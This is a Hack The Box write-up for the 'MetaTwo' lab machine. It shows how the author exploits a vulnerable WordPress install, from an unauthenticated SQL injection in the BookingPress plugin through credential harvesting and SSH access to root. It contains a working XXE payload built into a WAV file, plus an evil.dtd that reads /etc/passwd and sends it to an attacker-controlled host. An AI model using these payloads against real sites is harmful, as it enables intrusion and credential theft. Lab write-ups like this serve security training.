MetaTwo - HTB - Key Points
November 18, 2022•2,070 words
Target's IP: 10.10.11.186
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
Unknown host: metapress.htb
Proudly powered by WordPress. Let's enumerate using wpscan.
[i] Plugin(s) Identified:
[+] bookingpress-appointment-booking
| Location: http://metapress.htb/wp-content/plugins/bookingpress-appointment-booking/
| Last Updated: 2022-11-02T08:20:00.000Z
| Readme: http://metapress.htb/wp-content/plugins/bookingpress-appointment-booking/readme.txt
| [!] The version is out of date, the latest version is 1.0.46
|
| Found By: Known Locations (Aggressive Detection)
| - http://metapress.htb/wp-content/plugins/bookingpress-appointment-booking/, status: 200
|
| [!] 1 vulnerability identified:
|
| [!] Title: BookingPress < 1.0.11 - Unauthenticated SQL Injection
| Fixed in: 1.0.11
| References:
| - https://wpscan.com/vulnerability/388cd42d-b61a-42a4-8604-99b812db2357
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0739
| - https://plugins.trac.wordpress.org/changeset/2684789
|
| Version: 1.0.10 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://metapress.htb/wp-content/plugins/bookingpress-appointment-booking/readme.txt
| Confirmed By: Translation File (Aggressive Detection)
| - http://metapress.htb/wp-content/plugins/bookingpress-appointment-booking/languages/bookingpress-appointment-booking-en_US.po, Match: 'sion: BookingPres
s Appointment Booking v1.0.10'
There is a PoC for this particular vulnerability, we can run it and:
python3 booking-press-expl.py -u http://metapress.htb -n a3aa561d42
- BookingPress PoC
-- Got db fingerprint: 10.5.15-MariaDB-0+deb11u1
-- Count of users: 2
|admin|admin@metapress.htb|$P$BG...zk.TV.|
|manager|manager@metapress.htb|$P$B4...6Q70|
Trying to crack them, we can obtain the password for manager
There is another vulnerability we can exploit now, regarding the media library, as discussed here: https://blog.wpsec.com/wordpress-xxe-in-media-library-cve-2021-29447/
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://10.10.14.36/evil.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav
┌──(root㉿kali)-[/home/…/Desktop/ctf/htb/metatwo]
└─# cat evil.dtd
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://10.10.14.36/?p=%file;'>" >
Now we read the nginx config file that enables the sites hosted on the server, /etc/nginx/sites-enabled/default, where we find out that the default wordpress directory is /var/www/metapress.htb/blog
We can now read the wp-config.php to find credentials:
/** MySQL database username /
define( 'DB_USER', 'blog' );
/* MySQL database password /
define( 'DB_PASSWORD', '635...FUZ' );
/* MySQL hostname /
define( 'DB_HOST', 'localhost' );
/* Database Charset to use in creating database tables. /
define( 'DB_CHARSET', 'utf8mb4' );
/* The Database Collate type. Don't change this if in doubt. */
define( 'DBCOLLATE', '' );
define( 'FSMETHOD', 'ftpext' );
define( 'FTPUSER', 'metapress.htb' );
define( 'FTPPASS', '9NY...vJ' );
define( 'FTPHOST', 'ftp.metapress.htb' );
define( 'FTPBASE', 'blog/' );
define( 'FTPSSL', false );
In sendmail.php there is a set of creds as well:
$mail->Host = "mail.metapress.htb";
$mail->SMTPAuth = true;
$mail->Username = "jnelson@metapress.htb";
$mail->Password = "Cb4...@Ys";
$mail->SMTPSecure = "tls";
$mail->Port = 587;
We have ssh access with these creds
cat user.txt
e64...69
One of the keys has a weak passphrase, we can crack it using gpg2john + john the ripper
This passpie software seems to hold root's password for ssh, we can decrypt it thanks to the key we have, import it into your gpg and decrypt the message stored in passpie, thus retrieving the password for root access.: p7...0x
root@meta2:~# cat root.txt
fcd...6c
Merry hacking ;)